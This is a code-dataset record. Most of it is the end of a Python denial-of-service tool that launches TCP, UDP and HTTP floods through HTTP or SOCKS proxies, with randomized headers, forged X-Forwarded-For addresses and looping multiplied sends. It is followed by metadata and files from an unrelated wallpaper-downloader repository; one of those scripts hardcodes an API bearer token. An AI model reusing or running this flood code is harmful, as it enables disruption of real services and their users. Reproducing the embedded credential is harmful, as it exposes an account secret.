1000\n\t\tprint (\"1000 threads selected.\\n\")\n\tmultiplication()\n\ndef multiplication():\n\tglobal multiple\n\ttry:\n\t\tmultiple = int(input(\"请输入攻击倍数,推荐50-200 \"))\n\texcept ValueError:\n\t\tmultiple = 100\n\t\tprint(\"Multiple=100 is set\\n\")\n\t\tmultiplication()\n\tbegin()\n\ndef begin():\n\tchoice6 = input(\"按“Enter”开始攻击: \")\n\tif choice6 == \"\":\n\t\tloop()\n\telif choice6 == \"Enter\": #lool\n\t\tloop()\n\telif choice6 == \"enter\": #loool\n\t\tloop()\n\telse:\n\t\texit(0)\n\ndef loop():\n\tglobal threads\n\tglobal get_host\n\tglobal acceptall\n\tglobal connection\n\tglobal go\n\tglobal x\n\tif choice1 == \"0\": # se si e' scelta la http flood, scrive gli header \"statici\" per non appesantire i threads\n\t\tget_host = \"GET \" + url + \" HTTP/1.1\\r\\nHost: \" + url2 + \"\\r\\n\"\n\t\tacceptall = [\n\t\t\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\nAccept-Language: en-US,en;q=0.5\\r\\nAccept-Encoding: gzip, deflate\\r\\n\",\n\t\t\"Accept-Encoding: gzip, deflate\\r\\n\",\n\t\t\"Accept-Language: en-US,en;q=0.5\\r\\nAccept-Encoding: gzip, deflate\\r\\n\",\n\t\t\"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\\r\\nAccept-Language: en-US,en;q=0.5\\r\\nAccept-Charset: iso-8859-1\\r\\nAccept-Encoding: gzip\\r\\n\",\n\t\t\"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\\r\\nAccept-Charset: iso-8859-1\\r\\n\",\n\t\t\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\\r\\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\\r\\nAccept-Charset: utf-8, iso-8859-1;q=0.5\\r\\n\",\n\t\t\"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\\r\\nAccept-Language: en-US,en;q=0.5\\r\\n\",\n\t\t\"Accept: text/html, application/xhtml+xml, image/jxr, */*\\r\\nAccept-Encoding: gzip\\r\\nAccept-Charset: utf-8, iso-8859-1;q=0.5\\r\\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\\r\\n\",\n\t\t\"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\\r\\nAccept-Encoding: gzip\\r\\nAccept-Language: en-US,en;q=0.5\\r\\nAccept-Charset: utf-8, iso-8859-1;q=0.5\\r\\n,\"\n\t\t\"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\\r\\nAccept-Language: en-US,en;q=0.5\\r\\n\",\n\t\t\"Accept-Charset: utf-8, iso-8859-1;q=0.5\\r\\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\\r\\n\",\n\t\t\"Accept: text/html, application/xhtml+xml\",\n\t\t\"Accept-Language: en-US,en;q=0.5\\r\\n\",\n\t\t\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\\r\\n\",\n\t\t\"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\\r\\nAccept-Charset: iso-8859-1\\r\\n\",\n\t\t] # header accept a caso per far sembrare le richieste più legittime\n\t\tconnection = \"Connection: Keep-Alive\\r\\n\" # la keep alive torna sempre utile lol\n\tx = 0 # thanks therunixx, my friend\n\tgo = threading.Event()\n\tif choice1 == \"1\": # se si e' scelto tcp flood\n\t\tif choice2 == \"y\": # e si e scelta la modalita' proxying\n\t\t\tif choice3 == \"0\": # e si sono scelti gli HTTP proxy\n\t\t\t\tfor x in range(threads):\n\t\t\t\t\tTcpFloodProxed(x+1).start() # starta la classe apposita\n\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\t\telse: # altrimenti se si sono scelto è il tcp flood con socks\n\t\t\t\tfor x in range(threads):\n\t\t\t\t\tTcpFloodSocked(x+1).start() # starta la classe apposita\n\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\telse: # se non si sono stati scelti proxy o socks\n\t\t\tfor x in range(threads):\n\t\t\t\tTcpFloodDefault(x+1).start() # starta la classe apposita\n\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\telse: # oppure:\n\t\tif choice1 == \"2\": # se si e' scelto l'UDP flood\n\t\t\tif choice2 == \"y\": # e si e' scelta la modalita' proxying\n\t\t\t\tif choice3 == \"0\": # e si sono scelti gli HTTP proxy\n\t\t\t\t\tfor x in range(threads):\n\t\t\t\t\t\tUdpFloodProxed(x+1).start() # starta la classe apposita\n\t\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\t\t\telse: # se si sono scelti i socks\n\t\t\t\t\tfor x in range(threads):\n\t\t\t\t\t\tUdpFloodSocked(x+1).start() # starta la classe apposita\n\t\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\t\telse: # se non si sono scelti proxy o socks per l'udp flood\n\t\t\t\tfor x in range(threads):\n\t\t\t\t\tUdpFloodDefault(x+1).start() # starta la classe apposita\n\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\telse: # se si è scelto l'http flood\n\t\t\tif choice2 == \"y\": # se abbiamo scelto la modalita' proxying\n\t\t\t\tif choice3 == \"0\": # e abbiamo scelto gli HTTP proxy\n\t\t\t\t\tfor x in range(threads):\n\t\t\t\t\t\tRequestProxyHTTP(x+1).start() # starta la classe apposita\n\t\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\t\t\telse: # se abbiamo scelto i socks\n\t\t\t\t\tfor x in range(threads):\n\t\t\t\t\t\tRequestSocksHTTP(x+1).start() # starta la classe apposita\n\t\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\t\t\telse: # altrimenti manda richieste normali non proxate.\n\t\t\t\tfor x in range(threads):\n\t\t\t\t\tRequestDefaultHTTP(x+1).start() # starta la classe apposita\n\t\t\t\t\tprint (\"Thread \" + str(x) + \" ready!\")\n\t\t\t\tgo.set() # questo fa avviare i threads appena sono tutti pronti\n\nclass TcpFloodProxed(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tdata = random._urandom(1024) # data per il pacchetto random\n\t\tp = bytes(IP(dst=str(url2))/TCP(sport=RandShort(), dport=int(port))/data) # costruzione pacchetto tcp + data\n\t\tcurrent = x # per dare l'id al thread\n\t\tif current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy\n\t\t\tproxy = proxies[current].strip().split(':')\n\t\telse: # altrimenti lo prende a random\n\t\t\tproxy = random.choice(proxies).strip().split(\":\")\n\t\tgo.wait() # aspetta che tutti i proxy siano pronti\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_HTTP, str(proxy[0]), int(proxy[1]), True) # comando per il proxying HTTP\n\t\t\t\ts = socks.socksocket() # creazione socket\n\t\t\t\ts.connect((str(url2),int(port))) # si connette\n\t\t\t\ts.send(p) # ed invia\n\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se si verifica un errore\n\t\t\t\ts.close() # chiude il thread e ricomincia\n\nclass TcpFloodSocked(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tdata = random._urandom(1024) # data per il pacchetto random\n\t\tp = bytes(IP(dst=str(url2))/TCP(sport=RandShort(), dport=int(port))/data) # costruzione pacchetto tcp + data\n\t\tcurrent = x # per dare l'id al thread\n\t\tif current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy\n\t\t\tproxy = proxies[current].strip().split(':')\n\t\telse: # altrimenti lo prende a random\n\t\t\tproxy = random.choice(proxies).strip().split(\":\")\n\t\tgo.wait() # aspetta che threads siano pronti\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) # comando per il proxying via SOCKS\n\t\t\t\ts = socks.socksocket() # creazione socket\n\t\t\t\ts.connect((str(url2),int(port))) # si connette\n\t\t\t\ts.send(p) # ed invia\n\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se si verifica un errore\n\t\t\t\ts.close() # intanto chiude il precedente socket non funzionante\n\t\t\t\ttry:\n\t\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) # poi prova ad utilizzare SOCKS4, magari e' questo il problema dell'errore\n\t\t\t\t\ts = socks.socksocket() # creazione socket\n\t\t\t\t\ts.connect((str(url2),int(port))) # connessione\n\t\t\t\t\ts.send(p) # invio\n\t\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print req + counter\n\t\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\t\ts.close()\n\t\t\t\texcept: # se nemmeno questo funge, allora il sock e' down\n\t\t\t\t\tprint (\"Sock down. Retrying request. @\", self.counter)\n\t\t\t\t\ts.close() # chiude il socket e ricomincia ciclo\n\nclass TcpFloodDefault(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tdata = random._urandom(1024) # data per il pacchetto random\n\t\tp = bytes(IP(dst=str(url2))/TCP(sport=RandShort(), dport=int(port))/data) # costruzione pacchetto tcp + data\n\t\tgo.wait() # aspetta che tutti i threads siano pronti\n\t\twhile True: # ciclo infinito\n\t\t\ttry: # il try per non far chiudere il programma se qualcosa va storto\n\t\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # creazione solito socket\n\t\t\t\ts.connect((str(url2),int(port))) # connessione al target\n\t\t\t\ts.send(p) # questo manda il pacchetto tcp creato al target\n\t\t\t\tprint (\"Request Sent! @\", self.counter) # print richiesta + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se si verifica un errore\n\t\t\t\ts.close() # lo ignora e ricomincia il ciclo\n\nclass UdpFloodProxed(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tdata = random._urandom(1024) # data per il pacchetto random\n\t\tp = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data) # crea pacchetto udp classico + data\n\t\tcurrent = x # per dare l'id al thread\n\t\tif current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy\n\t\t\tproxy = proxies[current].strip().split(':')\n\t\telse: # altrimenti lo prende a random\n\t\t\tproxy = random.choice(proxies).strip().split(\":\")\n\t\tgo.wait() # aspetta che threads sono pronti\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_HTTP, str(proxy[0]), int(proxy[1]), True) # comando per il proxying HTTP\n\t\t\t\ts = socks.socksocket() # creazione socket\n\t\t\t\ts.connect((str(url2),int(port))) # connessione\n\t\t\t\ts.send(p) # invio\n\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se qualcosa va storto\n\t\t\t\ts.close() # chiude il socket\n\nclass UdpFloodSocked(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tdata = random._urandom(1024) # data per il pacchetto random\n\t\tp = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data) # crea pacchetto udp classico + data\n\t\tcurrent = x # per dare l'id al thread\n\t\tif current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy\n\t\t\tproxy = proxies[current].strip().split(':')\n\t\telse: # altrimenti lo prende a random\n\t\t\tproxy = random.choice(proxies).strip().split(\":\")\n\t\tgo.wait() # aspetta che threads siano pronti\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) # comando per il proxying con SOCKS\n\t\t\t\ts = socks.socksocket() # creazione socket\n\t\t\t\ts.connect((str(url2),int(port))) # connessione\n\t\t\t\ts.send(p) # invio\n\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se qualcosa va storto questo except chiude il socket e si collega al try sotto\n\t\t\t\ts.close() # intanto chiude il precedente socket non funzionante\n\t\t\t\ttry:\n\t\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) # poi prova ad utilizzare SOCKS4, magari e' questo il problema dell'errore\n\t\t\t\t\ts = socks.socksocket() # creazione socket\n\t\t\t\t\ts.connect((str(url2),int(port))) # connessione\n\t\t\t\t\ts.send(p) # invio\n\t\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # req + counter\n\t\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\t\ts.close()\n\t\t\t\texcept: # se nemmeno questo funge, allora il sock e' down\n\t\t\t\t\tprint (\"Sock down. Retrying request. @\", self.counter)\n\t\t\t\t\ts.close() # chiude il socket e ricomincia ciclo\n\nclass UdpFloodDefault(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tdata = random._urandom(1024) # data per il pacchetto random\n\t\tp = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data) # crea pacchetto udp classico + data\n\t\tgo.wait() # aspetta che i threads siano pronti\n\t\twhile True: # ciclo infinito\n\t\t\ttry: # il try per non far chiudere il programma se si verifica qualche errore\n\t\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # creazione socket\n\t\t\t\ts.connect((str(url2),int(port))) # connessione al target\n\t\t\t\ts.send(p) # questo manda il pacchetto udp creato al target\n\t\t\t\tprint (\"Request Sent! @\", self.counter) # print req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(p)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se si verifica un errore\n\t\t\t\ts.close() # lo ignora e ricomincia il ciclo\n\nclass RequestProxyHTTP(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tuseragent = \"User-Agent: \" + random.choice(useragents) + \"\\r\\n\" # scelta useragent a caso\n\t\taccept = random.choice(acceptall) # scelta header accept a caso\n\t\trandomip = str(random.randint(0,255)) + \".\" + str(random.randint(0,255)) + \".\" + str(random.randint(0,255)) + \".\" + str(random.randint(0,255))\n\t\tforward = \"X-Forwarded-For: \" + randomip + \"\\r\\n\" # X-Forwarded-For, un header HTTP che permette di incrementare anonimato (vedi google per info)\n\t\trequest = get_host + useragent + accept + forward + connection + \"\\r\\n\" # ecco la final request\n\t\tcurrent = x # per dare l'id al thread\n\t\tif current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy\n\t\t\tproxy = proxies[current].strip().split(':')\n\t\telse: # altrimenti lo prende a random\n\t\t\tproxy = random.choice(proxies).strip().split(\":\")\n\t\tgo.wait() # aspetta che i threads siano pronti\n\t\twhile True: # ciclo infinito\n\t\t\ttry:\n\t\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # ecco il nostro socket\n\t\t\t\ts.connect((str(proxy[0]), int(proxy[1]))) # connessione al proxy\n\t\t\t\ts.send(str.encode(request)) # encode in bytes della richiesta HTTP\n\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print delle richieste\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(request)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept:\n\t\t\t\ts.close() # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\nclass RequestSocksHTTP(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tuseragent = \"User-Agent: \" + random.choice(useragents) + \"\\r\\n\" # scelta proxy a caso\n\t\taccept = random.choice(acceptall) # scelta accept a caso\n\t\trequest = get_host + useragent + accept + connection + \"\\r\\n\" # composizione final request\n\t\tcurrent = x # per dare l'id al thread\n\t\tif current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy\n\t\t\tproxy = proxies[current].strip().split(':')\n\t\telse: # altrimenti lo prende a random\n\t\t\tproxy = random.choice(proxies).strip().split(\":\")\n\t\tgo.wait() # aspetta che threads siano pronti\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) # comando per proxarci con i socks\n\t\t\t\ts = socks.socksocket() # creazione socket con pysocks\n\t\t\t\ts.connect((str(url2), int(urlport))) # connessione\n\t\t\t\ts.send (str.encode(request)) # invio\n\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(request)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se qualcosa va storto questo except chiude il socket e si collega al try sotto\n\t\t\t\ts.close() # chiude socket\n\t\t\t\ttry: # il try prova a vedere se l'errore e' causato dalla tipologia di socks errata, infatti prova con SOCKS4\n\t\t\t\t\tsocks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) # prova con SOCKS4\n\t\t\t\t\ts = socks.socksocket() # creazione nuovo socket\n\t\t\t\t\ts.connect((str(url2), int(urlport))) # connessione\n\t\t\t\t\ts.send (str.encode(request)) # invio\n\t\t\t\t\tprint (\"Request sent from \" + str(proxy[0]+\":\"+proxy[1]) + \" @\", self.counter) # print req + counter\n\t\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\t\ts.send(str.encode(request)) # encode in bytes della richiesta HTTP\n\t\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\t\ts.close()\n\t\t\t\texcept:\n\t\t\t\t\tprint (\"Sock down. Retrying request. @\", self.counter)\n\t\t\t\t\ts.close() # se nemmeno con quel try si e' riuscito a inviare niente, allora il sock e' down e chiude il socket.\n\nclass RequestDefaultHTTP(threading.Thread): # la classe del multithreading\n\n\tdef __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter\n\t\tthreading.Thread.__init__(self)\n\t\tself.counter = counter\n\n\tdef run(self): # la funzione che da' le istruzioni ai vari threads\n\t\tuseragent = \"User-Agent: \" + random.choice(useragents) + \"\\r\\n\" # useragent a caso\n\t\taccept = random.choice(acceptall) # accept a caso\n\t\trequest = get_host + useragent + accept + connection + \"\\r\\n\" # composizione final request\n\t\tgo.wait() # aspetta che i threads siano pronti\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # creazione socket\n\t\t\t\ts.connect((str(url2), int(urlport))) # connessione\n\t\t\t\ts.send (str.encode(request)) # invio\n\t\t\t\tprint (\"Request sent! @\", self.counter) # print req + counter\n\t\t\t\ttry: # invia altre richieste nello stesso thread\n\t\t\t\t\tfor y in range(multiple): # fattore di moltiplicazione\n\t\t\t\t\t\ts.send(str.encode(request)) # encode in bytes della richiesta HTTP\n\t\t\t\texcept: # se qualcosa va storto, chiude il socket e il ciclo ricomincia\n\t\t\t\t\ts.close()\n\t\t\texcept: # se qualcosa va storto\n\t\t\t\ts.close() # chiude socket e ricomincia\n\n\nif __name__ == '__main__':\n\tstarturl() # questo fa startare la prima funzione del programma, che a sua volta ne starta un altra, poi un altra, fino ad arrivare all'attacco.\n" } ]
1
anmac/ACWallpaper
https://github.com/anmac/ACWallpaper
8cd81947696e67e3926190420cf696dbc849cb82
f30a4769634c99af38a8af82f0a868680c3f55e5
48d754bf3dde5b0107f3a2d78a2237ad510ab95f
refs/heads/master
2021-01-20T18:54:43.194252
2016-08-08T06:31:34
2016-08-08T06:31:34
65,177,498
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6217345595359802, "alphanum_fraction": 0.6729362607002258, "avg_line_length": 25.150684356689453, "blob_id": "20ff068250a9545ff6e80bc51f5e75566a206042", "content_id": "00e604b7a545df44d482dac1494829633acf2ebf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1938, "license_type": "no_license", "max_line_length": 136, "num_lines": 73, "path": "/DownWallpaper.py", "repo_name": "anmac/ACWallpaper", "src_encoding": "UTF-8", "text": "#coding=utf-8\n\nimport urllib\nimport urllib2\nimport cookielib\nfrom lxml import etree\nimport json\nimport sys\nimport os\n\n\ndef getPhotoList(url):\n\n\tdicPath = '/Users/huajianma/Pictures/ACWallpaper'\n # if not os.path.exists(dicPath):\n # os.makedirs(dicPath)\n\n\t# proxy_handler \t\t= urllib2.ProxyHandler({\"https\":\"https://huafenr.com/f/a903c12da03e0d3f40be\"})\n\t# # null_proxy_handler = urllib2.ProxyHandler({})\n\t# opener \t\t\t\t= urllib2.build_opener(proxy_handler)\n\t# urllib2.install_opener(opener)#全局\n # # opener = urllib2.build_opener(null_proxy_handler)\n\n\n\tuserAgent\t= \t'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36'\n\theaders\t\t=\t{\n\t\t\t\t\t\t'User-Agent':userAgent,\n\t\t\t\t\t\t'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n\t\t\t\t\t\t'authorization':'Bearer def5b99dc6ec754bee5891044243eea0f021af474f74a465f3c508fe9a7415e6'\n\t\t\t\t\t}\n\tdata\t\t=\turllib.urlencode({})\n\trequest \t=\turllib2.Request(url+'?'+data,headers=headers)\n\n\ttry:\n\t\tprint \"开始访问unsplash.com\"\n\t\tresponse \t= \turllib2.urlopen(request)\n\t\tbody = response.read().decode('utf-8');\n\t\tbody = json.loads(body)\n\t\t# print body\n\t\t# return;\n\n\t\tfor wallpaperItem in body:\n\n\t\t\tprint '===='*10\n\n\t\t\tfile_name \t\t=\t wallpaperItem['id']# + '.jpg'\n\t\t\timg_url\t\t\t=\t wallpaperItem['links']['download']\n\n\t\t\tprint file_name + \"\\n\" + img_url\n\n\t\t\tpath = dicPath + '/' + file_name\n\t\t\tif os.path.exists(path):\n\t\t\t\tprint('重复'+str(file_name))\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tprint('下载'+str(file_name))\n\t\t\t\ttempResponse = urllib2.urlopen(urllib2.Request(img_url))\n\t\t\t\timg_data = tempResponse.read()\n\t\t\t\tprint('保存'+str(file_name))\n\t\t\t\toutput = open(path, 'wb')\n\t\t\t\toutput.write(img_data)\n\t\t\t\toutput.close()\n\n\n\texcept urllib2.URLError, e:\n\t\tprint 'error - %d' % (e.code)\n\n\t# return liveList\n\n\n\n\nprint getPhotoList(\"https://unsplash.com/napi/photos?page=1&per_page=30&order_by=latest\")\n\n\n\n\n\n" }, { "alpha_fraction": 0.7510373592376709, "alphanum_fraction": 0.7634854912757874, "avg_line_length": 20.81818199157715, "blob_id": "6ac5eba56cae15848761b1caab2ac6ed314c7865", "content_id": "4ec6a43bbe693d094223404d2ad2eeba04a715d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 245, "license_type": "no_license", "max_line_length": 118, "num_lines": 11, "path": "/CopyLrvueImage.sh", "repo_name": "anmac/ACWallpaper", "src_encoding": "UTF-8", "text": "\nmkdir -p ~/Pictures/copyLrvue\n\ncp ~/Library/Containers/com.leonspok.osx.Irvue/Data/Library/Application\\ Support/Irvue/unsplash_* ~/Pictures/copyLrvue\n\necho \"copy - \"\n\nsleep 600\n\necho \"递归\"\n\nsh ~/Nut/python/demo/ACWallpaper/CopyLrvueImage.sh\n" }, { "alpha_fraction": 0.6659142374992371, "alphanum_fraction": 0.6659142374992371, "avg_line_length": 32.769229888916016, "blob_id": "40226638000051d0d2260371e57d69b30cc73c3a", "content_id": "162b4f28a17d941326baa7b7360f28c99ab461a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, 